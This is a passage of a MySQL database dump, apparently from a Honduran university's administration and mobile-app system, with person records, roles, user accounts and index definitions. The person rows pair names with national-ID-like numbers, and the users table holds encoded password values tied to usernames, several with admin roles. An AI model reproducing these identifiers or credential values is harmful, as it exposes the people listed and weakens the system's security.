'INACTIVO', NULL), (14, 'SANDRA JANETH ', 'QUAN GOMEZ', 'FEMENINO', '080100000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 3, 'INACTIVO', NULL), (15, 'EDIS JULIAN', 'REYES GARCIA', 'MASCULINO', '0808000000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 1, 'ACTIVO', NULL), (16, 'CAROLD ARGENTINA', 'RITHENHOUSE SABILLON', 'FEMENINO', '0808000000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 1, 'ACTIVO', NULL), (17, 'NELSON FRANCISCO', 'DIAZ VALLEJO', 'MASCULINO', '080800000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 1, 'ACTIVO', NULL), (18, 'ROSMERY CORRALES', 'APLICANO', 'FEMENINO', '0808000000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 1, 'ACTIVO', NULL), (19, 'MARTHA PATRICIA', 'ELLNER VILLALONGA', 'FEMENINO', '080800000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 1, 'ACTIVO', NULL), (20, 'FREDY ANDERSSON', 'MOTIÑO FLORES', 'MASCULINO', '0801199508298', 'HONDUREÑA', 'SOLTERO', '1995-05-04', 2, 'INACTIVO', NULL), (21, 'DANIEL ENRIQUE', 'RAMIREZ', 'MASCULINO', '080800000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 1, 'INACTIVO', NULL), (22, 'Linda Ceciclia', 'Villatoro Hernandez', 'Femenino', ' 0801-1111-1111_', NULL, NULL, '1997-06-12', 2, 'INACTIVO', NULL), (23, 'DULCE MONSERRAT', 'DEL CID FIALLOS', 'FEMENINO', '0801000000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 1, 'ACTIVO', NULL), (24, 'GIANCARLO MARTINI', 'SCALICI AGUILAR', 'MASCULINO', '0808000000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 1, 'ACTIVO', NULL), (25, 'CRISTIAN JOSUE', 'RIVERA RAMIREZ', 'MASCULINO', '080800000000', 'HONDUREÑA', 'SOLTERO', '2021-03-01', 1, 'ACTIVO', NULL), (26, 'Samanta', 'Ramirez', 'Femenino', ' 1111-1111-11111', NULL, NULL, '2021-03-05', 2, 'INACTIVO', NULL), (27, 'Edward Alberto', 'Alvarenga Rodriguez', 'Masculino', ' 0801-2222-02022', NULL, NULL, '1992-07-17', 2, 'INACTIVO', NULL), (39, 'ROSMERY ', 'CORRALES', 'FEMENINO', '0801-1273-33232', 'HONDUREÑA', 'CASADO', '2001-03-22', 1, 'INACTIVO', NULL), (61, 'Enrique ', 'Rivera', 'Masculino', ' 2222-2222-22222', NULL, NULL, '2021-03-07', 2, 'INACTIVO', NULL), (63, 'LESTER JOSUE ', 'FIALLOS PERALTA', 'MASCULINO', ' 0801-1990-01243', 'HONDUREÑA', 'SOLTERO', '1990-12-05', 1, 'ACTIVO', NULL), (66, 'Fredy andersson', 'MOTINO FLORES', 'MASCULINO', '0801199508298', 'FRANCÉSA', 'SOLTERO', '2021-03-01', 2, 'INACTIVO', NULL), (67, 'fredy', 'andersson cruz', 'FEMENINO', '0000000000000', 'AFGANA', 'SOLTERO', '2021-03-01', 1, 'INACTIVO', NULL), (68, 'fredy', 'a', 'MASCULINO', '00000000000', 'AFGANA', 'SOLTERO', '2021-03-01', 1, 'INACTIVO', NULL), (69, 'ander', 'fredy', '', '999999999999', 'AFGANA', 'UNION LIBRE', '2021-03-02', 1, 'INACTIVO', NULL), (70, 'andersson', 'flores', '', '8888888888', 'AFGANA', 'SOLTERO', '2021-03-03', 1, 'INACTIVO', NULL), (71, 'fredy', 'pao', 'MASCULINO', '9999999999', 'AFGANA', 'SOLTERO', '2021-03-02', 1, 'INACTIVO', NULL), (72, 'fred', 'an', '', '5555555555555', 'AFGANA', 'SOLTERO', '2021-03-01', 1, 'INACTIVO', NULL), (73, 'katherine andrea', 'alonzo', 'FEMENINO', ' 0801-1967-02806', 'AUSTRALIANA', 'SOLTERO', '1967-06-09', 1, 'INACTIVO', NULL), (74, 'Lisa', 'Lucas', 'FEMENINO', ' 0801-1985-29999', 'ALEMANA', 'SOLTERO', '1985-06-01', 2, 'INACTIVO', NULL), (77, 'HANSY NICOL', 'PONCE PONCE', 'Femenino', NULL, NULL, NULL, NULL, 2, 'INACTIVO', NULL), (80, 'CARLOS GUSTAVO', 'ROMERO GALEANO', 'MASCULINO', '0805-1990-00123', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (81, 'CARMEN SUYAPA', 'GONZALEZ SANTOS', 'FEMENINO', '0801-1990-00135', 'HONDUREÑA', 'CASADO', '1990-04-05', 1, 'ACTIVO', NULL), (82, 'CLAUDIA REGINA', 'NUÑEZ GALINDO', 'FEMENINO', '0901-1990-12300', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (83, 'DAVID MARTIN', 'ROVELO HERNANDEZ', 'MASCULINO', '0901-1990-12344', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (84, 'DILMA DORIS', 'ORTEGA TROCHE', 'FEMENINO', '0801-1990-00456', 'HONDUREÑA', 'CASADO', '1990-03-31', 1, 'ACTIVO', NULL), (85, 'DINORA PATRICIA', 'VELASQUEZ VELASQUEZ', 'FEMENINO', '0801-1990-12345', 'HONDUREÑA', 'CASADO', '1990-03-30', 1, 'ACTIVO', NULL), (86, 'DULIS PATRICIA', 'CORDOVA GALO', 'FEMENINO', '0901-1990-67890', 'HONDUREÑA', 'CASADO', '1990-03-29', 1, 'ACTIVO', NULL), (87, 'HECTOR ALBERTO', 'BERRIOS RODRIGUEZ', 'MASCULINO', '0901-1990-67853', 'HONDUREÑA', 'CASADO', '1990-04-21', 1, 'ACTIVO', NULL), (88, 'IRMA YADIRA', 'GAMEZ SUAZO', 'FEMENINO', '0801-1990-66543', 'HONDUREÑA', 'CASADO', '1990-03-07', 1, 'ACTIVO', NULL), (89, 'ISAAC ARMANDO', 'DUBON SAM', 'MASCULINO', '0901-1990-12689', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (90, 'JORGE ALBERTO', 'REYES GARCIA', 'MASCULINO', '0901-1990-00565', 'HONDUREÑA', 'CASADO', '1990-03-30', 1, 'ACTIVO', NULL), (91, 'KARLA MARIA', 'CHEVEZ FLORES', 'FEMENINO', '0801-1990-08654', 'HONDUREÑA', 'CASADO', '1990-04-13', 1, 'ACTIVO', NULL), (92, 'LUIS EDUARDO', 'ERAZO TRIMARCHI', 'FEMENINO', '0801-1990-09876', 'HONDUREÑA', 'CASADO', '1990-04-05', 1, 'ACTIVO', NULL), (93, 'MARCO ANTONIO', 'AVILA ORTEGA', 'MASCULINO', '0808-1990-21313', 'HONDUREÑA', 'CASADO', '1990-03-31', 1, 'ACTIVO', NULL), (94, 'MARIA LORENA', 'ALVARADO LEVERON', 'FEMENINO', '0801-1990-98765', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (95, 'MARVIN JOSUE', 'AGUILAR ROMERO', 'MASCULINO', '0801-1990-87654', 'HONDUREÑA', 'CASADO', '1990-04-04', 1, 'ACTIVO', NULL), (96, 'MARVIN LEONEL', 'MENDOZA DIAZ', 'MASCULINO', '0901-1990-11112', 'HONDUREÑA', 'CASADO', '1990-03-30', 1, 'ACTIVO', NULL), (97, 'MARVIN NOE', 'JAIME MERINO', 'MASCULINO', '0801-1990-11111', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (98, 'MILVIA ESPERANZA', 'GUERRA', 'FEMENINO', '0901-1990-56789', 'HONDUREÑA', 'CASADO', '1990-01-06', 1, 'ACTIVO', NULL), (99, 'OBED HUMBERTO', 'MARTINEZ REYES', 'FEMENINO', '0801-1990-04546', 'HONDUREÑA', 'CASADO', '1990-04-15', 1, 'ACTIVO', NULL), (100, 'SANDRA JANETH', 'QUAN GOMEZ', 'FEMENINO', '0901-1990-45678', 'HONDUREÑA', 'CASADO', '1990-03-29', 1, 'ACTIVO', NULL), (101, 'YOLANY MARITZA', 'FLORES NAZAR', 'FEMENINO', '0801-1990-65778', 'HONDUREÑA', 'CASADO', '1990-04-14', 1, 'ACTIVO', NULL), (102, 'EDUARDO ENRIQUE', 'SANTOS CASTILLO', 'MASCULINO', '0801-1990-67890', 'HONDUREÑA', 'CASADO', '1990-04-13', 1, 'ACTIVO', NULL), (103, 'KARLA MELISA', 'GARCIA PINEDA', 'FEMENINO', '0801-1990-16578', 'HONDUREÑA', 'CASADO', '1988-03-30', 1, 'ACTIVO', NULL), (104, 'CARLOS EDUARDO', 'ORDOÑEZ RODRIGUEZ', 'MASCULINO', '0801-1990-43546', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (105, 'CESAR ALEJANDRO', 'MALDONADO CRUZ', 'MASCULINO', '0801-1990-90898', 'HONDUREÑA', 'CASADO', '1990-03-31', 1, 'ACTIVO', NULL), (106, 'DILMA AURORA', 'MONCADA AVILA', 'FEMENINO', '0801-1990-88383', 'HONDUREÑA', 'CASADO', '1990-04-05', 1, 'ACTIVO', NULL), (107, 'HEBER DE JESUS', 'AGUILERA RIVERA', 'MASCULINO', '0801-1990-55777', 'HONDUREÑA', 'CASADO', '1990-03-28', 1, 'ACTIVO', NULL), (108, 'HECTOR ENRIQUE', 'HERNANDEZ PEDRANO', 'MASCULINO', '0801-1990-55141', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (109, 'JOSE ADALBERTO', 'SIERRA RODAS', 'MASCULINO', '0801-1990-53131', 'HONDUREÑA', 'CASADO', '1990-03-30', 1, 'ACTIVO', NULL), (110, 'JOSE FRANCISCO', 'PAGOAGA ACOSTA', 'MASCULINO', '0801-1990-66372', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (111, 'JOSE MARIO', 'REYES AGUILAR', 'MASCULINO', '0801-1990-44151', 'HONDUREÑA', 'CASADO', '1990-04-06', 1, 'ACTIVO', NULL), (112, 'LEONARDO ALFREDO', 'ZAMBRANA AGUILAR', 'MASCULINO', '0801-1990-17727', 'HONDUREÑA', 'CASADO', '1990-03-30', 1, 'ACTIVO', NULL), (113, 'LESTER JOSUE', 'FIALLOS PERALTA', 'MASCULINO', '0801-1990-11188', 'HONDUREÑA', 'CASADO', '1990-03-31', 1, 'ACTIVO', NULL), (114, 'REBECA ISABEL', 'ESPINAL DIAZ', 'FEMENINO', '0801-1990-65611', 'HONDUREÑA', 'CASADO', '1990-03-30', 1, 'ACTIVO', NULL), (115, 'TANIA YESENIA', 'VALLADARES BAISA', 'FEMENINO', '0801-1990-11113', 'HONDUREÑA', 'CASADO', '1990-03-30', 1, 'ACTIVO', NULL), (116, 'ANGELICA AMELISA', 'MUÑOZ SALINAS', 'FEMENINO', '0801-1990-66551', 'HONDUREÑA', 'CASADO', '1991-03-30', 1, 'ACTIVO', NULL), (117, 'JOSE LUIS', 'RODRIGUEZ GARCIA', 'MASCULINO', '0801-1990-11101', 'HONDUREÑA', 'CASADO', '1990-04-20', 1, 'ACTIVO', NULL), (118, 'HECTOR', 'GALINDO PINEDA', 'MASCULINO', '0801-1990-11103', 'HONDUREÑA', 'CASADO', '1990-04-21', 1, 'ACTIVO', NULL), (130, 'Elia', 'Rivera', 'Femenino', ' 2222-2222-22222', NULL, NULL, '2021-04-02', 2, 'INACTIVO', NULL), (148, 'PRUEBA', 'PRUEBA', 'MASCULINO', '0801-1999-88999', 'HONDUREÑA', 'UNION LIBRE', '1994-04-23', 1, 'ACTIVO', NULL), (149, 'PRUEBA', 'PRUEBAA', 'FEMENINO', '0801-1887-88280', 'HONDUREÑA', 'SOLTERO', '2000-04-30', 1, 'ACTIVO', NULL), (150, 'PRUEBAC', 'PRUEBAD', 'FEMENINO', '0801-1995-00433', 'HONDUREÑA', 'SOLTERO', '1995-04-15', 1, 'ACTIVO', NULL), (151, 'Gabriel', 'Obando', 'Masculino', NULL, NULL, NULL, NULL, 2, NULL, NULL), (152, 'Gabriel', 'Obando', 'MASCULINO', '0801199902356', 'HONDUREÑA', 'SOLTERO', '1997-02-05', 2, NULL, NULL), (153, 'Helmer', 'Calix', 'Masculino', NULL, NULL, NULL, NULL, 2, NULL, NULL), (154, 'Daniel Enrique ', 'Ramirez Rivera', 'Masculino', NULL, NULL, NULL, NULL, 2, NULL, NULL), (155, 'CRISTIANO', 'RONALDO', 'MASCULINO', '44445', 'PORTUGUÉSA', 'UNION LIBRE', '1992-05-12', 1, 'ACTIVO', 1), (156, 'lucia fernanda', 'ponce avila', 'FEMENINO', '0801199615579', 'HONDUREÑA', 'UNION LIBRE', '1996-01-02', 1, NULL, NULL), (157, 'ever', 'palada', 'Masculino', NULL, NULL, NULL, NULL, 2, NULL, NULL), (158, 'Isai', 'romero', 'masculino', '0801-2000-14525', 'HONDURAÑA', 'soltero', '1997-12-18', 2, 'ACTIVO', NULL); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_roles` -- CREATE TABLE `tbl_roles` ( `Id_rol` bigint(20) NOT NULL, `Rol` varchar(255) NOT NULL, `descripcion` varchar(255) NOT NULL, `estado` int(11) NOT NULL, `Fecha_creacion` datetime DEFAULT NULL, `Creado_por` varchar(255) DEFAULT NULL, `Modificado_por` varchar(255) DEFAULT NULL, `Fecha_modificacion` datetime DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_roles` -- INSERT INTO `tbl_roles` (`Id_rol`, `Rol`, `descripcion`, `estado`, `Fecha_creacion`, `Creado_por`, `Modificado_por`, `Fecha_modificacion`) VALUES (46, 'ADMIN', 'PRUEBA', 1, '2020-05-20 00:00:00', 'da', 'admin', '2020-05-22 20:45:47'), (49, 'ESTUDIANTE', 'ES ESTUDIANTE', 1, '2020-06-11 00:19:42', 'ADMIN', NULL, NULL), (51, 'PRUEBAE', 'DE PRUEBA', 1, '2020-08-05 16:38:41', 'ADMIN', NULL, NULL), (53, 'OPERADOR', 'OPERADOR DE SOLICITUDES', 1, '2020-08-11 06:06:20', 'ADMIN', NULL, NULL), (54, 'JEFE VINCULACION', 'JEFE DEL DEPTO DE VINCULACION', 1, '2020-08-18 16:43:56', 'ADMIN', NULL, NULL), (55, 'VINCULACION', 'PERSONAL DE VINCULACION', 1, '2020-08-18 16:44:58', 'ADMIN', NULL, NULL), (56, 'COORDINADORES', 'COORDINADORES DE CARRERA', 1, '2020-08-18 16:45:42', 'ADMIN', 'ADMIN', '2020-08-18 23:45:50'), (57, 'COMITE AUTOMATIZACION', 'DOCENTES PERTENECIENTES COMITE', 1, '2020-08-18 16:46:57', 'ADMIN', NULL, NULL), (59, 'PRACTICA PROFESIONAL', 'PRACTICA PROFESIONAL', 0, '2020-08-28 06:24:33', 'RCORRALES', NULL, NULL), (61, 'PRUEBAEE', 'DF', 1, '2020-12-05 02:59:21', 'ADMIN', 'ADMIN', '2021-04-14 01:44:12'), (62, 'PRUEBAX', 'PRUEBAX', 0, '2020-12-05 21:19:40', 'ADMIN', NULL, NULL), (63, 'PRUEBAPRUEBA', 'PRUEBAS', 1, '2021-02-11 17:36:06', 'ADMIN', NULL, NULL), (64, 'DOCENTE', 'prubando', 1, '2021-03-22 17:07:46', 'ADMIN', NULL, NULL), (65, 'OPERATIVO', 'PAA EL PERSONAL OPERATIVO I', 1, '2021-04-04 18:22:31', 'RCORRALES', NULL, NULL), (66, 'PRUEBAFINAL', 'FINAL FINAL', 1, '2021-04-14 00:27:34', 'ADMIN', NULL, NULL), (67, 'PRUEBANINI', 'LLKJ', 1, '2021-04-14 01:40:32', 'ADMIN', 'ADMIN', '2021-04-14 01:41:18'), (68, 'EJEMPLO', 'PRUEBA', 1, '2021-04-23 01:36:51', 'ADMIN', 'ADMIN', '2021-04-23 01:47:21'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_tipos_persona` -- CREATE TABLE `tbl_tipos_persona` ( `id_tipo_persona` int(11) NOT NULL DEFAULT 0, `tipo_persona` varchar(50) NOT NULL DEFAULT '', `descripcion` varchar(100) NOT NULL DEFAULT '' ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Volcado de datos para la tabla `tbl_tipos_persona` -- INSERT INTO `tbl_tipos_persona` (`id_tipo_persona`, `tipo_persona`, `descripcion`) VALUES (1, 'DOCENTE', 'ingresado para prueba'), (2, 'ESTUDIANTE', 'ingresado para prueba'), (3, 'COORDINADOR', 'ingresado para prueba'); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_tipo_docente` -- CREATE TABLE `tbl_tipo_docente` ( `id_tipo_docente` int(11) NOT NULL, `tipo_docente` varchar(50) NOT NULL, `descripcion` varchar(50) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- -- Volcado de datos para la tabla `tbl_tipo_docente` -- INSERT INTO `tbl_tipo_docente` (`id_tipo_docente`, `tipo_docente`, `descripcion`) VALUES (1, 'SUED', ''), (2, 'CU', NULL); -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_usuarios` -- CREATE TABLE `tbl_usuarios` ( `Id_usuario` bigint(20) NOT NULL, `id_persona` bigint(20) NOT NULL, `Usuario` varchar(255) NOT NULL, `Id_rol` bigint(20) NOT NULL, `estado` int(11) NOT NULL, `Contrasena` varchar(255) NOT NULL, `Intentos` int(11) DEFAULT NULL, `Ultima_conexion` datetime DEFAULT NULL, `Fec_vence_contrasena` datetime DEFAULT NULL, `Fecha_creacion` varchar(255) DEFAULT NULL, `Creado_por` varchar(255) DEFAULT NULL, `Modificado_por` varchar(255) DEFAULT NULL, `Fecha_modificacion` datetime DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_usuarios` -- INSERT INTO `tbl_usuarios` (`Id_usuario`, `id_persona`, `Usuario`, `Id_rol`, `estado`, `Contrasena`, `Intentos`, `Ultima_conexion`, `Fec_vence_contrasena`, `Fecha_creacion`, `Creado_por`, `Modificado_por`, `Fecha_modificacion`) VALUES (1, 6, 'ADMIN', 46, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, '2020-09-21 00:00:00', '2023-11-29 10:13:57', '2020-09-21 00:00:00', NULL, 'ADMIN', '2021-04-14 01:52:38'), (2, 20, 'ANDERMFL', 46, 1, 'SHcwQVp4OEFBeFZuM3B5SUpiSzQ0UT09', 0, NULL, '2022-03-18 21:22:59', NULL, NULL, NULL, NULL), (43, 22, 'LVILLATORO', 49, 1, 'MjZROTgrU3RPV3pLMVNVNTEwSXU4QT09', 0, NULL, '2021-05-31 18:11:08', '2021-03-18 23:17:10', NULL, NULL, NULL), (45, 14, 'SQUAN', 55, 2, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-12-30 00:00:00', '2021-03-18', 'ADMIN', NULL, NULL), (46, 15, 'EREYES', 55, 1, 'SHcwQVp4OEFBeFZuM3B5SUpiSzQ0UT09', 0, NULL, '2022-12-30 00:00:00', '2021-03-18', 'ADMIN', NULL, NULL), (47, 16, 'CSABILLON', 55, 2, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-12-30 00:00:00', '2021-03-18', 'ADMIN', NULL, NULL), (48, 17, 'NDIAZ', 64, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-12-30 00:00:00', '2021-03-18', 'ADMIN', NULL, NULL), (49, 18, 'RCORRALES', 46, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-12-30 00:00:00', '2021-03-18', 'ADMIN', NULL, NULL), (50, 19, 'MVILLALONGA', 46, 1, 'UE0zU2h6NzlCZEVQR0gwdUc3Z2cwQT09', 2, NULL, '2022-12-30 00:00:00', '2021-03-18', 'ADMIN', 'MVILLALONGA', '2021-06-03 01:01:38'), (51, 23, 'DFIALLOS', 56, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-12-30 00:00:00', '2021-03-18', 'ADMIN', NULL, NULL), (52, 21, 'DRAMIREZ', 55, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-12-30 00:00:00', '2021-03-18', 'ADMIN', NULL, NULL), (53, 23, 'SRAMIREZ', 64, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2021-03-19 16:27:55', '2021-03-19 16:27:55', NULL, NULL, NULL), (54, 27, 'EALVARENGA', 49, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2021-03-19 17:07:29', '2021-03-19 17:07:29', NULL, NULL, NULL), (55, 10, 'FANY', 64, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, NULL, NULL, NULL, NULL, NULL), (58, 61, 'ERIVERA', 49, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2021-03-23 22:18:39', '2021-03-23 22:18:39', NULL, NULL, NULL), (59, 24, 'GSCALICI', 64, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-12-30 00:00:00', '2021-03-25 00:00:00', 'ADMIN', NULL, NULL), (60, 63, 'LFIALLOS', 46, 2, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-12-30 00:00:00', '2021-03-25 00:00:00', 'ADMIN', NULL, NULL), (61, 77, 'HPONCE', 49, 2, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2021-04-06 19:09:57', '2021-04-06 19:09:57', NULL, NULL, NULL), (63, 130, 'ERIVERA', 49, 1, 'SHcwQVp4OEFBeFZuM3B5SUpiSzQ0UT09', 0, NULL, '2021-06-03 00:00:47', '2021-04-19 20:53:49', NULL, NULL, NULL), (64, 23, 'DCID', 56, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, '2021-04-30 11:10:27', '2023-11-29 10:13:57', NULL, 'ADMIN', NULL, NULL), (65, 23, 'MCID', 64, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-04-30 11:22:12', NULL, NULL, NULL, NULL), (66, 83, 'DROVELO', 64, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-04-30 11:46:12', NULL, NULL, NULL, NULL), (69, 148, 'PRUEBA', 64, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2022-04-30 13:37:38', NULL, NULL, NULL, NULL), (70, 151, 'GOBANDO', 49, 1, 'amhEMEVzRmRHUWF5OTk5dERDRzlMQT09', 0, NULL, '2021-05-18 17:10:27', '2021-05-18 17:10:27', NULL, NULL, NULL), (71, 153, 'HCALIX', 49, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2021-05-19 17:58:30', '2021-05-19 17:58:30', NULL, NULL, NULL), (73, 156, 'LUCIFER', 46, 0, 'SHcwQVp4OEFBeFZuM3B5SUpiSzQ0UT09', 0, NULL, NULL, NULL, NULL, 'LUCIFER', '2021-06-03 00:11:36'), (74, 157, 'EPALADA', 49, 2, 'Q04wZTIwUlBsT3hXdEFsZzhDRUhBdz09', NULL, NULL, '2021-06-08 06:25:19', '2021-06-08 06:25:19', NULL, NULL, NULL), (75, 158, 'IROMERO', 46, 1, 'RE9mSEpzSGJpQnAvTXpDUEdtZTFvUT09', 0, NULL, '2021-12-11 19:24:51', '2021-06-08 19:22:10', 'ADMIN', NULL, NULL); -- -- Índices para tablas volcadas -- -- -- Indices de la tabla `tbl_movil_bitacora` -- ALTER TABLE `tbl_movil_bitacora` ADD PRIMARY KEY (`id`), ADD KEY `fk_tbl_movil_bitacora_tbl_usuarios1_idx` (`usuario_id`), ADD KEY `fk_tbl_movil_bitacora_tbl_objetos1_idx` (`objeto_id`); -- -- Indices de la tabla `tbl_movil_bitacora_deleted` -- ALTER TABLE `tbl_movil_bitacora_deleted` ADD PRIMARY KEY (`id`); -- -- Indices de la tabla `tbl_movil_mensajes_chat` -- ALTER TABLE `tbl_movil_mensajes_chat` ADD PRIMARY KEY (`id_mensaje`), ADD KEY `fk_tbl_movil_mensajes_chat_tbl_movil_session_chats_idx` (`id_session_chat`), ADD KEY `fk_tbl_movil_mensajes_chat_tbl_movil_tipo_mensajes_idx` (`tipo_mensaje`); -- -- Indices de la tabla `tbl_movil_noticias` -- ALTER TABLE `tbl_movil_noticias` ADD PRIMARY KEY (`id`), ADD KEY `fk_tbl_movil_noticias_tbl_segmentos1_idx` (`segmento_id`); -- -- Indices de la tabla `tbl_movil_noticia_recurso` -- ALTER TABLE `tbl_movil_noticia_recurso` ADD KEY `fk_tbl_movil_noticia_recurso_tbl_movil_noticias_idx` (`noticia_id`), ADD KEY `fk_tbl_movil_noticia_recurso_tbl_movil_tipo_recursos1_idx` (`recurso_id`); -- -- Indices de la tabla `tbl_movil_notificaciones` -- ALTER TABLE `tbl_movil_notificaciones` ADD PRIMARY KEY (`id`), ADD KEY `fk_tbl_movil_notificaciones_tbl_movil_segmentos1_idx` (`segmento_id`), ADD KEY `fk_tbl_movil_notificaciones_tbl_movil_tipo_notificaciones1_idx` (`tipo_notificacion_id`); -- -- Indices de la tabla `tbl_movil_parametros` -- ALTER TABLE `tbl_movil_parametros` ADD PRIMARY KEY (`id`), ADD KEY `fk_tbl_movil_parametros_tbl_usuarios1_idx` (`modificado_por`); -- -- Indices de la tabla `tbl_movil_segmentos` -- ALTER TABLE `tbl_movil_segmentos` ADD PRIMARY KEY (`id`); -- -- Indices de la tabla `tbl_movil_segmento_usuario` -- ALTER TABLE `tbl_movil_segmento_usuario` ADD KEY `fk_tbl_movil_segmento_usuario_tbl_usuarios1_idx` (`usuario_id`), ADD KEY `fk_tbl_movil_segmento_usuario_tbl_movil_segmentos1_idx` (`segmento_id`); -- -- Indices de la tabla `tbl_movil_session_chats` -- ALTER TABLE `tbl_movil_session_chats` ADD PRIMARY KEY (`id_session_chat`), ADD KEY `fk_tbl_movil_session_chats_tbl_usuarios1_idx` (`id_usuario1`), ADD KEY `fk_tbl_movil_session_chats_tbl_usuarios2_idx` (`id_usuario2`); -- -- Indices de la tabla `tbl_movil_tipo_mensajes` -- ALTER TABLE `tbl_movil_tipo_mensajes` ADD PRIMARY KEY (`id`); -- -- Indices de la tabla `tbl_movil_tipo_notificaciones` -- ALTER TABLE `tbl_movil_tipo_notificaciones` ADD PRIMARY KEY (`id`); -- -- Indices de la tabla `tbl_movil_tipo_recursos` -- ALTER TABLE `tbl_movil_tipo_recursos` ADD PRIMARY KEY (`id`); -- -- Indices de la tabla `tbl_movil_transacciones` -- ALTER TABLE `tbl_movil_transacciones` ADD PRIMARY KEY (`id`); -- -- Indices de la tabla `tbl_objetos` -- ALTER TABLE `tbl_objetos` ADD PRIMARY KEY (`Id_objeto`); -- -- Indices de la tabla `tbl_parametros` -- ALTER TABLE `tbl_parametros` ADD PRIMARY KEY (`Id_parametro`), ADD KEY `FK_usuarios_parametros` (`Id_usuario`); -- -- Indices de la tabla `tbl_permisos_usuarios` -- ALTER TABLE `tbl_permisos_usuarios` ADD PRIMARY KEY (`Id_permisos_usuario`), ADD KEY `cod_rol` (`Id_rol`), ADD KEY `cod_objeto` (`Id_objeto`); -- -- Indices de la tabla `tbl_personas` -- ALTER TABLE `tbl_personas` ADD PRIMARY KEY (`id_persona`), ADD KEY `FK_tbl_personas_tbl_tipo_docente` (`id_tipo_docente`), ADD KEY `tbl_personas_tbl_tipos_persona_id_tipo_persona_fk` (`id_tipo_persona`) USING BTREE; -- -- Indices de la tabla `tbl_roles` -- ALTER TABLE `tbl_roles` ADD PRIMARY KEY (`Id_rol`); -- -- Indices de la tabla `tbl_tipos_persona` -- ALTER TABLE `tbl_tipos_persona` ADD PRIMARY KEY (`id_tipo_persona`); -- -- Indices de la tabla `tbl_tipo_docente` -- ALTER TABLE `tbl_tipo_docente` ADD PRIMARY KEY (`id_tipo_docente`); -- -- Indices de la tabla `tbl_usuarios` -- ALTER TABLE `tbl_usuarios` ADD PRIMARY KEY (`Id_usuario`), ADD KEY `FK_personas_usuarios` (`id_persona`), ADD KEY `FK_rol_usuarios` (`Id_rol`); -- -- AUTO_INCREMENT de las tablas volcadas -- -- -- AUTO_INCREMENT de la tabla `tbl_movil_bitacora` -- ALTER TABLE `tbl_movil_bitacora` MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=246; -- -- AUTO_INCREMENT de la tabla `tbl_movil_mensajes_chat` -- ALTER TABLE `tbl_movil_mensajes_chat` MODIFY `id_mensaje` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=24; -- -- AUTO_INCREMENT de la tabla `tbl_movil_noticias` -- ALTER TABLE `tbl_movil_noticias` MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3; -- -- AUTO_INCREMENT de la tabla `tbl_movil_notificaciones` -- ALTER TABLE `tbl_movil_notificaciones` MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3; -- -- AUTO_INCREMENT de la tabla `tbl_movil_parametros` -- ALTER TABLE `tbl_movil_parametros` MODIFY `id` bigint(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6; -- -- AUTO_INCREMENT de la tabla `tbl_movil_segmentos` -- ALTER TABLE `tbl_movil_segmentos` MODIFY `id` bigint(20) NOT NULL 